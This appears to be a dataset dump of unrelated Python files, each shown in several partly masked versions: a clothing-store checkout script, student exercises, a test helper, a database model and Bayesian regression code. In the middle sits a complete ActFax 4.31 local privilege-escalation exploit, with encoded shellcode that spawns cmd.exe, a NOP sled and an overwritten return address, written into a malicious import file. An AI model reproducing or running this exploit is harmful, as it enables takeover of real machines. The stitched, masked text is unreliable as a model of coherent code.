print('Ahorro: ', ahorro)
print('Total Con Promo: ', precioTotal)
print('Forma de Pago: ', formaDePago)
print('Monto a Pagar: ', montoAPagar)
print('Usted obtiene: ', superPuntos, 'SuperPuntos')
print('----------------------------------------------------')
| print('-' * 100)
print('BIENVENIDOS A TIENDA ELEGANCIA')
print('-' * 100)
prendas = ('Remeras', 'Camisas', 'Pantalones', 'Faldas', 'Vestidos',
'Abrigos', 'Calzado')
precioSinPromo = 0
superPuntos = 0
tipoPrenda1 = int(input(
'Ingrese Codigo de la prenda seleccionada: 0=Remeras, 1=Camisas, 2=Pantalones, 3=Faldas, 4=Vestidos, 5=Abrigos, 6=Calzado: '
))
prendaseleccionada1 = prendas[tipoPrenda1]
print(prendaseleccionada1)
precio1 = float(input('Ingrese precio: $'))
precioinicial1 = precio1
precioSinPromo = precioSinPromo + precio1
print('La prenda: ', tipoPrenda1, 'participa de del plan SuperPuntos? s/n')
valor1 = input()
v1 = None
if valor1 == 's':
v1 = 's'
valor1 = precio1
superPuntos = superPuntos + precio1
elif valor1 == 'n':
v1 = 'n'
valor1 = 0
tipoPrenda2 = int(input(
'Ingrese Codigo de la prenda seleccionada: 0=Remeras, 1=Camisas, 2=Pantalones, 3=Faldas, 4=Vestidos, 5=Abrigos, 6=Calzado: '
))
prendaseleccionada2 = prendas[tipoPrenda2]
print(prendaseleccionada2)
precio2 = float(input('Ingrese precio: $'))
precioinicial2 = precio2
precioSinPromo = precioSinPromo + precio2
print('La prenda: ', tipoPrenda2, 'participa de del plan SuperPuntos? s/n')
valor2 = input()
v2 = None
if valor2 == 's':
v2 = 's'
valor2 = precio2
superPuntos = superPuntos + precio2
elif valor2 == 'n':
v2 = 'n'
valor2 = 0
tipoPrenda3 = int(input(
'Ingrese Codigo de la prenda seleccionada: 0=Remeras, 1=Camisas, 2=Pantalones, 3=Faldas, 4=Vestidos, 5=Abrigos, 6=Calzado: '
))
prendaseleccionada3 = prendas[tipoPrenda3]
print(prendaseleccionada3)
precio3 = float(input('Ingrese precio: $'))
precioinicial3 = precio3
precioSinPromo = precioSinPromo + precio3
print('La prenda: ', tipoPrenda3, 'participa de del plan SuperPuntos? s/n')
valor3 = input()
v3 = None
if valor3 == 's':
v3 = 's'
valor3 = precio3
superPuntos = superPuntos + precio3
elif valor3 == 'n':
v3 = 'n'
valor3 = 0
if tipoPrenda1 == tipoPrenda2 == tipoPrenda3:
if precio1 < precio2 and precio1 < precio3:
precio1 = 0
elif precio2 < precio3:
precio2 = 0
else:
precio3 = 0
if tipoPrenda1 == tipoPrenda2 and tipoPrenda1 != tipoPrenda3:
if precio1 > precio2:
precio1 = precio1 / 2
else:
precio2 = precio2 / 2
if tipoPrenda1 == tipoPrenda3 and tipoPrenda1 != tipoPrenda2:
if precio1 > precio3:
precio1 = precio1 / 2
else:
precio3 = precio3 / 2
if tipoPrenda2 == tipoPrenda3 and tipoPrenda2 != tipoPrenda1:
if precio2 > precio3:
precio2 = precio2 / 2
else:
precio3 = precio3 / 2
precioTotal = precio1 + precio2 + precio3
ahorro = precioSinPromo - precioTotal
formaDePago = int(input('Ingrese la forma de pago:/ 1=Contado/ 2=Tarjeta'))
montoAPagar = 0
if formaDePago == 1:
formaDePago = 'Contado (%10 de Descuento)'
montoAPagar = precioTotal / 100 * 90
elif formaDePago == 2:
cuotas = int(input('ingrese en cuantas cuotas desea pagar:'))
if cuotas <= 3:
formaDePago = 'Tarjeta (%2 de Recarga) cantidad de cuotas:', cuotas
montoAPagar = precioTotal / 100 * 102
elif cuotas > 3:
formaDePago = 'Tarjeta (%5 de Recarga) cantidad de cuotas:', cuotas
montoAPagar = precioTotal / 100 * 105
elif cuotas <= 0:
formaDePago = 'Contado (%10 de Descuento)'
montoAPagar = precioTotal / 100 * 90
if valor1 > 0 and valor2 > 0 and valor3 > 0:
superPuntos = superPuntos * 2
print('----------------------------------------------------')
print('Tienda Elegancia')
print('Tipo, Precio, SuperPuntos')
print(prendaseleccionada1, precioinicial1, v1)
print(prendaseleccionada2, precioinicial2, v2)
print(prendaseleccionada3, precioinicial3, v3)
print('Total sin promo: ', precioSinPromo)
print('Ahorro: ', ahorro)
print('Total Con Promo: ', precioTotal)
print('Forma de Pago: ', formaDePago)
print('Monto a Pagar: ', montoAPagar)
print('Usted obtiene: ', superPuntos, 'SuperPuntos')
print('----------------------------------------------------')
| print('-'*100)
print('BIENVENIDOS A TIENDA ELEGANCIA')
print('-'*100)
prendas = ('Remeras', 'Camisas', 'Pantalones', 'Faldas', 'Vestidos', 'Abrigos', 'Calzado')
precioSinPromo = 0
superPuntos = 0
#ITEM 1
tipoPrenda1 = int(input('Ingrese Codigo de la prenda seleccionada: 0=Remeras, 1=Camisas, 2=Pantalones, 3=Faldas, 4=Vestidos, 5=Abrigos, 6=Calzado: '))
prendaseleccionada1 = prendas[tipoPrenda1]
print(prendaseleccionada1)
precio1 = float(input('Ingrese precio: $'))
precioinicial1 = precio1
precioSinPromo = precioSinPromo + precio1
print("La prenda: ", tipoPrenda1,"participa de del plan SuperPuntos? s/n")
valor1 = input()
v1 = None
if(valor1 == "s"):
v1 = 's'
valor1 = precio1
superPuntos = superPuntos + precio1
else:
if(valor1 == "n"):
v1 = "n"
valor1 = 0
# ITEM 2
tipoPrenda2 = int(input('Ingrese Codigo de la prenda seleccionada: 0=Remeras, 1=Camisas, 2=Pantalones, 3=Faldas, 4=Vestidos, 5=Abrigos, 6=Calzado: '))
prendaseleccionada2 = prendas[tipoPrenda2]
print(prendaseleccionada2)
precio2 = float(input('Ingrese precio: $'))
precioinicial2 = precio2
precioSinPromo = precioSinPromo + precio2
print("La prenda: ", tipoPrenda2, "participa de del plan SuperPuntos? s/n")
valor2 = input()
v2 = None
if (valor2 == "s"):
v2 = "s"
valor2 = precio2
superPuntos = superPuntos + precio2
else:
if (valor2 == "n"):
v2 = "n"
valor2 = 0
# ITEM 3
tipoPrenda3 = int(input('Ingrese Codigo de la prenda seleccionada: 0=Remeras, 1=Camisas, 2=Pantalones, 3=Faldas, 4=Vestidos, 5=Abrigos, 6=Calzado: '))
prendaseleccionada3 = prendas[tipoPrenda3]
print(prendaseleccionada3)
precio3 = float(input('Ingrese precio: $'))
precioinicial3 = precio3
precioSinPromo = precioSinPromo + precio3
print("La prenda: ", tipoPrenda3, "participa de del plan SuperPuntos? s/n")
valor3 = input()
v3 = None
if (valor3 == "s"):
v3 = "s"
valor3 = precio3
superPuntos = superPuntos + precio3
else:
if (valor3 == "n"):
v3 = "n"
valor3 = 0
#3-FOR-2 PROMO
if tipoPrenda1 == tipoPrenda2 == tipoPrenda3:
if precio1 < precio2 and precio1 < precio3:
precio1 = 0
else:
if precio2 < precio3:
precio2 = 0
else:
precio3 = 0
#50% PROMO
if tipoPrenda1 == tipoPrenda2 and tipoPrenda1 != tipoPrenda3:
if precio1 > precio2:
precio1 = precio1 / 2
else:
precio2 = precio2 / 2
if tipoPrenda1 == tipoPrenda3 and tipoPrenda1 != tipoPrenda2:
if precio1 > precio3:
precio1 = precio1 / 2
else:
precio3 = precio3 / 2
if tipoPrenda2 == tipoPrenda3 and tipoPrenda2 != tipoPrenda1:
if precio2 > precio3:
precio2 = precio2 / 2
else:
precio3 = precio3 / 2
precioTotal = precio1 + precio2 + precio3
ahorro = precioSinPromo - precioTotal
#PAYMENT METHOD
formaDePago = int(input("Ingrese la forma de pago:/ 1=Contado/ 2=Tarjeta"))
montoAPagar = 0
if formaDePago == 1:
formaDePago = "Contado (%10 de Descuento)"
montoAPagar=precioTotal/100*90
else:
if(formaDePago == 2):
cuotas=int(input("ingrese en cuantas cuotas desea pagar:"))
if(cuotas <= 3):
formaDePago="Tarjeta (%2 de Recarga) cantidad de cuotas:", cuotas
montoAPagar=precioTotal/100*102
else:
if(cuotas > 3):
formaDePago="Tarjeta (%5 de Recarga) cantidad de cuotas:", cuotas
montoAPagar=precioTotal/100*105
else:
if(cuotas <= 0):
formaDePago="Contado (%10 de Descuento)"
montoAPagar=precioTotal/100*90
if valor1 > 0 and valor2 > 0 and valor3 > 0:
superPuntos = superPuntos * 2
print("----------------------------------------------------")
print("Tienda Elegancia")
print("Tipo, Precio, SuperPuntos")
print(prendaseleccionada1 , precioinicial1, v1)
print(prendaseleccionada2 , precioinicial2 , v2)
print(prendaseleccionada3 , precioinicial3 , v3)
print("Total sin promo: ", precioSinPromo)
print("Ahorro: ", ahorro)
print("Total Con Promo: ", precioTotal)
print("Forma de Pago: ", formaDePago)
print("Monto a Pagar: ", montoAPagar)
print("Usted obtiene: ", superPuntos, "SuperPuntos")
print("----------------------------------------------------") | null | [
0,
1,
2,
3
] |
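The 3-for-2 branch in the row above can be stated more compactly over (type, price) pairs; a hypothetical helper with the same discount semantics (the cheapest of three garments of the same type becomes free):

def apply_three_for_two(items):
    # items: list of three (garment_type, price) tuples
    if len(items) == 3 and len({t for t, _ in items}) == 1:
        cheapest = min(range(3), key=lambda i: items[i][1])
        items[cheapest] = (items[cheapest][0], 0.0)
    return items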
1,685 | 732886306d949c4059b08e1bc46de3ad95ba56cb | <mask token>
def gprimo(nmax):
    for x in range(2, nmax):
for i in range(2, x):
if x % i != 0:
continue
else:
break
else:
yield x
<mask token>
| <mask token>
def gprimo(nmax):
    for x in range(2, nmax):
for i in range(2, x):
if x % i != 0:
continue
else:
break
else:
yield x
<mask token>
def genBadaBoom(N):
if N > 0:
for i in range(1, N + 1):
if i % 3 == 0 and i % 5 == 0:
yield 'Bada Boom!!'
elif i % 3 == 0:
yield 'Bada'
elif i % 5 == 0:
yield 'Boom!!'
else:
yield i
<mask token>
| <mask token>
def gprimo(nmax):
    for x in range(2, nmax):
for i in range(2, x):
if x % i != 0:
continue
else:
break
else:
yield x
<mask token>
print(z)
<mask token>
def genBadaBoom(N):
if N > 0:
for i in range(1, N + 1):
if i % 3 == 0 and i % 5 == 0:
yield 'Bada Boom!!'
elif i % 3 == 0:
yield 'Bada'
elif i % 5 == 0:
yield 'Boom!!'
else:
yield i
<mask token>
print(z)
<mask token>
print(combinaciones)
print('El número de combinaciones es:', len(combinaciones))
<mask token>
print(combinacionesFedora)
print('Número de combinaciones que incluyen sombrero fedora:', len(
combinacionesFedora))
<mask token>
print(Y)
| <mask token>
def gprimo(nmax):
    for x in range(2, nmax):
for i in range(2, x):
if x % i != 0:
continue
else:
break
else:
yield x
a = gprimo(10)
z = [e for e in a]
print(z)
<mask token>
def genBadaBoom(N):
if N > 0:
for i in range(1, N + 1):
if i % 3 == 0 and i % 5 == 0:
yield 'Bada Boom!!'
elif i % 3 == 0:
yield 'Bada'
elif i % 5 == 0:
yield 'Boom!!'
else:
yield i
a = genBadaBoom(10)
z = [e for e in a]
print(z)
<mask token>
camisas = ['roja', 'negra', 'azul', 'morada', 'cafe']
pantalones = ['negro', 'azul', 'cafe obscuro', 'crema']
accesorios = ['cinturon', 'tirantes', 'lentes', 'fedora']
combinaciones = [(x, y, z) for y in camisas for x in pantalones for z in
accesorios]
print(combinaciones)
print('El número de combinaciones es:', len(combinaciones))
<mask token>
combinacionesFedora = [(x, y, z) for x, y, z in combinaciones if z == 'fedora']
print(combinacionesFedora)
print('Número de combinaciones que incluyen sombrero fedora:', len(
combinacionesFedora))
<mask token>
cancion = """There's a hole in my heart, in my life, in my way
And it's filled with regret and all I did, to push you away
If there's still a place in your life, in your heart for me
I would do anything, so don't ask me to leave
I've got a hole in my soul where you use to be
You're the thorn in my heart and you're killing me
I wish I could go back and do it all differently
I wish that I'd treated you differently
'Cause now there's a hole in my soul where you use to be"""
cancion = list(cancion)
frecuenciaPalab = [cancion.count(w.casefold()) for w in cancion]
letra = filter(lambda a: cancion.count(a) == min(frecuenciaPalab), cancion)
Y = list(letra)
Y = dict.fromkeys(Y).keys()
print(Y)
| """
Primes <generators> 30 pts
Write a generator that yields all the prime numbers
between 0 and n-1, matching the following prototype:
def gprimo(N):
pass
a = gprimo(10)
z = [e for e in a]
print(z)
# [2, 3 ,5 ,7 ]
"""
def gprimo(nmax):
    for x in range(2, nmax):  # start at 2 so that 1 is not yielded as a prime
        for i in range(2, x):
            if x % i != 0:
                # i does not divide x; x may still be prime
                continue
            else:
                # i divides x, so x is not prime
                break
        else:
            # the loop finished without break: the number under test is prime
            yield x
a = gprimo(10)
z =[e for e in a]
print(z)
"""
Bada Boom!!! <generators> 20 pts
Define a generator that takes a positive integer N greater than 0
and yields the numbers from 1 to N
with the following conditions:
1) if the number is a multiple of 3, yield the string "Bada"
2) if the number is a multiple of 5, yield the string "Boom!!"
3) if it is a multiple of both 3 and 5, yield "Bada Boom!!"
def genBadaBoom(N):
pass
a = genBadaBoom(10)
z = [e for e in a]
print(z)
#[1,2,"Bada",4,"Boom","Bada",7,8,"Bada","Boom"]
"""
def genBadaBoom(N):
if N > 0:
for i in range(1,N+1):
if(i % 3 == 0 and i % 5 == 0):
yield "Bada Boom!!"
elif(i % 3 == 0):
yield "Bada"
elif(i % 5 == 0):
yield "Boom!!"
else:
yield i
a = genBadaBoom(10)
z = [e for e in a]
print(z)
"""
Combinations <list comprehensions> 30 pts
A clothing store wants to know how many outfits can be assembled
from a set of 5 shirts (red, black, blue, purple and brown),
4 trousers (black, blue, dark brown and cream) and one of 4 possible
accessories (belt, suspenders, glasses, fedora)
1) Build a list with every possible outfit and print it to the screen
2) Print a message stating how many outfits are possible
"""
camisas = ["roja","negra","azul","morada","cafe"]
pantalones = ["negro", "azul", "cafe obscuro", "crema"]
accesorios = ["cinturon", "tirantes", "lentes", "fedora"]
combinaciones = [(x, y, z) for y in camisas for x in pantalones for z in accesorios]
print(combinaciones)
print("El número de combinaciones es:",len(combinaciones))
"""
Fedora? <list comprehensions> 15 pts
From the previous problem, print a list containing every outfit
that includes a fedora hat, and also display its length
"""
combinacionesFedora = [(x, y, z) for (x,y,z) in combinaciones if z == 'fedora']
print(combinacionesFedora)
print("Número de combinaciones que incluyen sombrero fedora:",len(combinacionesFedora))
"""
<Monads> 30 pts
--Lacrimosa - Durch Nacht und Flut --
Die Suche endet jetzt und hier
Gestein kalt und nass
Granit in Deiner Brust
Der Stein der Dich zerdrückt
Der Fels der Dich umgibt
Aus dem gehauen Du doch bist
Despiertate te busco
Mi corazon abreté te libro
Elevate mi luz y prende mi llama
Si a ti, yo se, te encontrare
The fragment above is a song by the duo Lacrimosa.
Using monads, find the letter that repeats the least
in each line, and compute the probability of drawing that
letter.
Note: recursive functions and list comprehensions may help.
"""
"""
<Monads>
--Hole in my soul apocalyptica-- 20 pts
The fragment above is a song by the band Apocalyptica.
Using monads, find the letter that repeats the least
in the whole fragment, and compute the probability of drawing that
letter.
Note: recursive functions and list comprehensions may help.
"""
cancion = """There's a hole in my heart, in my life, in my way
And it's filled with regret and all I did, to push you away
If there's still a place in your life, in your heart for me
I would do anything, so don't ask me to leave
I've got a hole in my soul where you use to be
You're the thorn in my heart and you're killing me
I wish I could go back and do it all differently
I wish that I'd treated you differently
'Cause now there's a hole in my soul where you use to be"""
cancion = list(cancion)  # turn the lyrics into a list of characters
frecuenciaPalab = [cancion.count(w.casefold()) for w in cancion]  # count each letter's frequency, duplicates included
letra = filter(lambda a: cancion.count(a) == min(frecuenciaPalab), cancion)  # keep the letters whose count equals the minimum frequency computed above
Y = list(letra)  # materialize the filter
Y = dict.fromkeys(Y).keys()  # drop duplicates (dict keys cannot repeat)
print(Y)
| [
1,
2,
3,
4,
5
] |
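As a cross-check on the last exercise in the row above, the same least-frequent-letter computation via collections.Counter (Counter accepts the sample's cancion whether it is still a string or already a list of characters):

from collections import Counter

counts = Counter(cancion)                  # letter -> frequency
least = min(counts.values())
rarest = {c for c, n in counts.items() if n == least}
probability = least / len(cancion)         # chance of drawing one such letter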
1,686 | e9c88e18472281438783d29648c673aa08366abb | <mask token>
class GpTestCase(unittest.TestCase):
def __init__(self, methodName='runTest'):
super(GpTestCase, self).__init__(methodName)
self.patches = []
self.mock_objs = []
def apply_patches(self, patches):
if self.patches:
raise Exception('Test class is already patched!')
self.patches = patches
self.mock_objs = [p.start() for p in self.patches]
def tearDown(self):
[p.stop() for p in self.patches]
self.mock_objs = []
<mask token>
| <mask token>
class GpTestCase(unittest.TestCase):
def __init__(self, methodName='runTest'):
super(GpTestCase, self).__init__(methodName)
self.patches = []
self.mock_objs = []
def apply_patches(self, patches):
if self.patches:
raise Exception('Test class is already patched!')
self.patches = patches
self.mock_objs = [p.start() for p in self.patches]
def tearDown(self):
[p.stop() for p in self.patches]
self.mock_objs = []
def add_setup(setup=None, teardown=None):
"""decorate test functions to add additional setup/teardown contexts"""
def decorate_function(test):
def wrapper(self):
if setup:
setup(self)
test(self)
if teardown:
teardown(self)
return wrapper
return decorate_function
def run_tests():
unittest.main(verbosity=2, buffer=True)
<mask token>
| <mask token>
class GpTestCase(unittest.TestCase):
def __init__(self, methodName='runTest'):
super(GpTestCase, self).__init__(methodName)
self.patches = []
self.mock_objs = []
def apply_patches(self, patches):
if self.patches:
raise Exception('Test class is already patched!')
self.patches = patches
self.mock_objs = [p.start() for p in self.patches]
def tearDown(self):
[p.stop() for p in self.patches]
self.mock_objs = []
def add_setup(setup=None, teardown=None):
"""decorate test functions to add additional setup/teardown contexts"""
def decorate_function(test):
def wrapper(self):
if setup:
setup(self)
test(self)
if teardown:
teardown(self)
return wrapper
return decorate_function
def run_tests():
unittest.main(verbosity=2, buffer=True)
skip = unittest.skip
| import unittest2 as unittest
class GpTestCase(unittest.TestCase):
def __init__(self, methodName='runTest'):
super(GpTestCase, self).__init__(methodName)
self.patches = []
self.mock_objs = []
def apply_patches(self, patches):
if self.patches:
raise Exception('Test class is already patched!')
self.patches = patches
self.mock_objs = [p.start() for p in self.patches]
def tearDown(self):
[p.stop() for p in self.patches]
self.mock_objs = []
def add_setup(setup=None, teardown=None):
"""decorate test functions to add additional setup/teardown contexts"""
def decorate_function(test):
def wrapper(self):
if setup:
setup(self)
test(self)
if teardown:
teardown(self)
return wrapper
return decorate_function
def run_tests():
unittest.main(verbosity=2, buffer=True)
skip = unittest.skip
| import unittest2 as unittest
class GpTestCase(unittest.TestCase):
def __init__(self, methodName='runTest'):
super(GpTestCase, self).__init__(methodName)
self.patches = []
self.mock_objs = []
def apply_patches(self, patches):
if self.patches:
raise Exception('Test class is already patched!')
self.patches = patches
self.mock_objs = [p.start() for p in self.patches]
# if you have a tearDown() in your test class,
# be sure to call this using super.tearDown()
def tearDown(self):
[p.stop() for p in self.patches]
self.mock_objs = []
def add_setup(setup=None, teardown=None):
"""decorate test functions to add additional setup/teardown contexts"""
def decorate_function(test):
def wrapper(self):
if setup:
setup(self)
test(self)
if teardown:
teardown(self)
return wrapper
return decorate_function
# hide unittest dependencies here
def run_tests():
unittest.main(verbosity=2, buffer=True)
skip = unittest.skip
| [
4,
6,
7,
8,
9
] |
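A small usage sketch for the add_setup decorator in the row above; the resource and test names are hypothetical:

def _connect(self):
    self.conn = object()  # stand-in for a real resource

def _disconnect(self):
    self.conn = None

class ConnTest(GpTestCase):
    @add_setup(setup=_connect, teardown=_disconnect)
    def test_uses_conn(self):
        self.assertIsNotNone(self.conn)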
1,687 | 1b7048ef17b3512b9944ce7e197db27f4fd1aed0 | <mask token>
| <mask token>
f.write(
'User Name\tEntire User Name\tPassword\tAlias-Names\tGroup\tDirect Dialing\tCost Account\tPermissions\tComments\tUser-Defined\tPredefined Settings\tName 1\tName 2\tName 3\tName 4\tName 5\tDepartment\tAttention of\tPhone 1\tPhone 2\tFax Number\tE-Mail\tCoverpage Non-Windows\tOverlay Non-Windows\tCoverpage Windows\tOverlay Windows\tUser-Defined\tPrinter Settings\tAutomatic Printing Outgoing\tPrinter Name Outgoing\tReport Outgoing\tAutomatic Printing Incoming\tPrinter Name Incoming\tReport Incoming\tNotification Outgoing\tEmail Outgoing\tNotification Incoming\tEmail Incoming\tAttach Original Message\tUser-Defined Archive Settings\tExport Outgoing\tExport Incoming\tExport-Path\tMark as Read\r\n'
+ buff + '\r\n')
f.close()
| sc = (
'\x89åÛÎÙuôXPYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLZHMYEP5PS0CPMYJEVQHRU4LK62P0LK62DLLK0RR4LK42VH4O87QZ7VFQKOFQ9PNLGL51CLC26L10IQHO4MUQXGJBL00RPWLKPRR0LK72GLUQXPLKG03HK59P44PJ31N00PLKW8R8LK68Q031N3KSWLW9LKVTLKS1HV6QKOFQO0NLIQXOTMUQ9WP8KP2UZTS3CMKHGK3MFDSEZB68LK0XGTEQICE6LKDL0KLK68ULS1YCLKTDLKUQHPLI1TGT6DQK1KU1691J61KOM0QHQOPZLKUBZKMV1MRJEQLMMUOIEPS0S0F0BH6QLKROMWKO9EOKJPNU921FU8Y6MEOMMMKOXUWL5VSLDJMPKKM0RUUUOK775CRR2OCZC0V3KON52C2ME4FN55CHE530AA'
)
frontpad = '\x90' * 10
eip = '"\x1b@\x00'
backpad = '\x90' * 6000
buff = frontpad + sc + '\x90' * (502 - len(sc)) + eip + backpad
f = open('pwnag3.exp', 'w')
f.write(
'User Name\tEntire User Name\tPassword\tAlias-Names\tGroup\tDirect Dialing\tCost Account\tPermissions\tComments\tUser-Defined\tPredefined Settings\tName 1\tName 2\tName 3\tName 4\tName 5\tDepartment\tAttention of\tPhone 1\tPhone 2\tFax Number\tE-Mail\tCoverpage Non-Windows\tOverlay Non-Windows\tCoverpage Windows\tOverlay Windows\tUser-Defined\tPrinter Settings\tAutomatic Printing Outgoing\tPrinter Name Outgoing\tReport Outgoing\tAutomatic Printing Incoming\tPrinter Name Incoming\tReport Incoming\tNotification Outgoing\tEmail Outgoing\tNotification Incoming\tEmail Incoming\tAttach Original Message\tUser-Defined Archive Settings\tExport Outgoing\tExport Incoming\tExport-Path\tMark as Read\r\n'
+ buff + '\r\n')
f.close()
| #!/usr/bin/python
#Title: ActFax 4.31 Local Privilege Escalation Exploit
#Author: Craig Freyman (@cd1zz)
#Discovered: July 10, 2012
#Vendor Notified: June 12, 2012
#Description: http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html
#msfpayload windows/exec CMD=cmd.exe R | msfencode -e x86/alpha_upper -f c
#[*] x86/alpha_upper succeeded with size 466 (iteration=1)
sc = (
"\x89\xe5\xdb\xce\xd9\x75\xf4\x58\x50\x59\x49\x49\x49\x49"
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a"
"\x48\x4d\x59\x45\x50\x35\x50\x53\x30\x43\x50\x4d\x59\x4a"
"\x45\x56\x51\x48\x52\x55\x34\x4c\x4b\x36\x32\x50\x30\x4c"
"\x4b\x36\x32\x44\x4c\x4c\x4b\x30\x52\x52\x34\x4c\x4b\x34"
"\x32\x56\x48\x34\x4f\x38\x37\x51\x5a\x37\x56\x46\x51\x4b"
"\x4f\x46\x51\x39\x50\x4e\x4c\x47\x4c\x35\x31\x43\x4c\x43"
"\x32\x36\x4c\x31\x30\x49\x51\x48\x4f\x34\x4d\x55\x51\x58"
"\x47\x4a\x42\x4c\x30\x30\x52\x50\x57\x4c\x4b\x50\x52\x52"
"\x30\x4c\x4b\x37\x32\x47\x4c\x55\x51\x58\x50\x4c\x4b\x47"
"\x30\x33\x48\x4b\x35\x39\x50\x34\x34\x50\x4a\x33\x31\x4e"
"\x30\x30\x50\x4c\x4b\x57\x38\x52\x38\x4c\x4b\x36\x38\x51"
"\x30\x33\x31\x4e\x33\x4b\x53\x57\x4c\x57\x39\x4c\x4b\x56"
"\x54\x4c\x4b\x53\x31\x48\x56\x36\x51\x4b\x4f\x46\x51\x4f"
"\x30\x4e\x4c\x49\x51\x58\x4f\x54\x4d\x55\x51\x39\x57\x50"
"\x38\x4b\x50\x32\x55\x5a\x54\x53\x33\x43\x4d\x4b\x48\x47"
"\x4b\x33\x4d\x46\x44\x53\x45\x5a\x42\x36\x38\x4c\x4b\x30"
"\x58\x47\x54\x45\x51\x49\x43\x45\x36\x4c\x4b\x44\x4c\x30"
"\x4b\x4c\x4b\x36\x38\x55\x4c\x53\x31\x59\x43\x4c\x4b\x54"
"\x44\x4c\x4b\x55\x51\x48\x50\x4c\x49\x31\x54\x47\x54\x36"
"\x44\x51\x4b\x31\x4b\x55\x31\x36\x39\x31\x4a\x36\x31\x4b"
"\x4f\x4d\x30\x51\x48\x51\x4f\x50\x5a\x4c\x4b\x55\x42\x5a"
"\x4b\x4d\x56\x31\x4d\x52\x4a\x45\x51\x4c\x4d\x4d\x55\x4f"
"\x49\x45\x50\x53\x30\x53\x30\x46\x30\x42\x48\x36\x51\x4c"
"\x4b\x52\x4f\x4d\x57\x4b\x4f\x39\x45\x4f\x4b\x4a\x50\x4e"
"\x55\x39\x32\x31\x46\x55\x38\x59\x36\x4d\x45\x4f\x4d\x4d"
"\x4d\x4b\x4f\x58\x55\x57\x4c\x35\x56\x53\x4c\x44\x4a\x4d"
"\x50\x4b\x4b\x4d\x30\x52\x55\x55\x55\x4f\x4b\x37\x37\x35"
"\x43\x52\x52\x32\x4f\x43\x5a\x43\x30\x56\x33\x4b\x4f\x4e"
"\x35\x32\x43\x32\x4d\x45\x34\x46\x4e\x35\x35\x43\x48\x45"
"\x35\x33\x30\x41\x41")
frontpad = "\x90" * 10
eip = "\x22\x1b\x40\x00" #00401B22 RETN actfax.exe
backpad = "\x90" * 6000
buff = frontpad + sc + "\x90" * (502 - len(sc)) + eip + backpad
f = open("pwnag3.exp", "w")
f.write(
"User Name\tEntire User Name\tPassword\tAlias-Names\tGroup\tDirect Dialing\tCost Account\tPermissions\tComments\tUser-Defined\t"
"Predefined Settings\tName 1\tName 2\tName 3\tName 4\tName 5\tDepartment\tAttention of\tPhone 1\tPhone 2\tFax Number\tE-Mail\t"
"Coverpage Non-Windows\tOverlay Non-Windows\tCoverpage Windows\tOverlay Windows\tUser-Defined\tPrinter Settings\tAutomatic Printing Outgoing\t"
"Printer Name Outgoing\tReport Outgoing\tAutomatic Printing Incoming\tPrinter Name Incoming\tReport Incoming\tNotification Outgoing\t"
"Email Outgoing\tNotification Incoming\tEmail Incoming\tAttach Original Message\tUser-Defined Archive Settings\tExport Outgoing\t"
"Export Incoming\tExport-Path\tMark as Read\x0d\x0a"+buff+"\x0d\x0a")
f.close()
| null | [
0,
1,
2,
3
] |
1,688 | 6fbf64e2dc2836a54e54ee009be1d0d8d7c7037a | <mask token>
| <mask token>
class Messages(SQLMixin, SQLBase):
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
| <mask token>
class Messages(SQLMixin, SQLBase):
__tablename__ = 'Messages'
title = Column(Unicode(50), nullable=False)
content = Column(UnicodeText, nullable=False)
sender_id = Column(Integer, nullable=False)
receiver_id = Column(Integer, nullable=False)
| import time
from sqlalchemy import Column, Unicode, UnicodeText, Integer
from models.base_model import SQLMixin, db, SQLBase
class Messages(SQLMixin, SQLBase):
__tablename__ = 'Messages'
title = Column(Unicode(50), nullable=False)
content = Column(UnicodeText, nullable=False)
sender_id = Column(Integer, nullable=False)
receiver_id = Column(Integer, nullable=False)
| null | [
0,
1,
2,
3
] |
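A minimal usage sketch for the Messages model in the row above (hypothetical engine URL and session setup; SQLBase is the declarative base the sample imports, and SQLMixin is assumed to contribute the primary key):

from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker

engine = create_engine('sqlite:///:memory:')
SQLBase.metadata.create_all(engine)
session = sessionmaker(bind=engine)()
session.add(Messages(title='hi', content='hello there', sender_id=1, receiver_id=2))
session.commit()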
1,689 | 057140ef1b8db340656b75b3a06cea481e3f20af | <mask token>
class TwoStage(BayesianModel):
<mask token>
<mask token>
<mask token>
class TwoStageBF(BayesianModel):
"""
Two Stage Inference.
First stage: Bootstrapped ElasticNet
Second stage: Use loci that were learned in the first stage
and their mean and std as priors for a simple
Bayesian Linear Regression
Attributes:
"""
def __init__(self, coef_mean, coef_sd, p_sigma_beta=10, *args, **kwargs):
"""
Args:
"""
self.name = 'TwoStageBF'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean, 'coef_sd': coef_sd,
'p_sigma_beta': p_sigma_beta}
super(TwoStageBF, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
"""
Simple Bayesian Linear Regression
Args:
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
Returns:
pymc3.Model(): The Bayesian model
"""
n_ind, n_snps = gwas_gen.eval().shape
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med', mu=self.vars['coef_mean'], sd=
self.vars['coef_sd'], shape=(1, n_snps))
mediator = pm.dot(beta_med, gwas_gen.T)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
p = np.array([0.5, 0.5])
mediator_model = pm.Bernoulli('mediator_model', p[1])
phenotype_mu_null = intercept
phenotype_mu_mediator = intercept + alpha * mediator
phen = pm.DensityDist('phen', lambda value: pm.switch(
mediator_model, pm.Normal.dist(mu=phenotype_mu_mediator, sd
=phenotype_sigma).logp(value), pm.Normal.dist(mu=
phenotype_mu_null, sd=phenotype_sigma).logp(value)),
observed=gwas_phen)
self.steps = [pm.BinaryGibbsMetropolis(vars=[mediator_model]),
pm.Metropolis()]
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
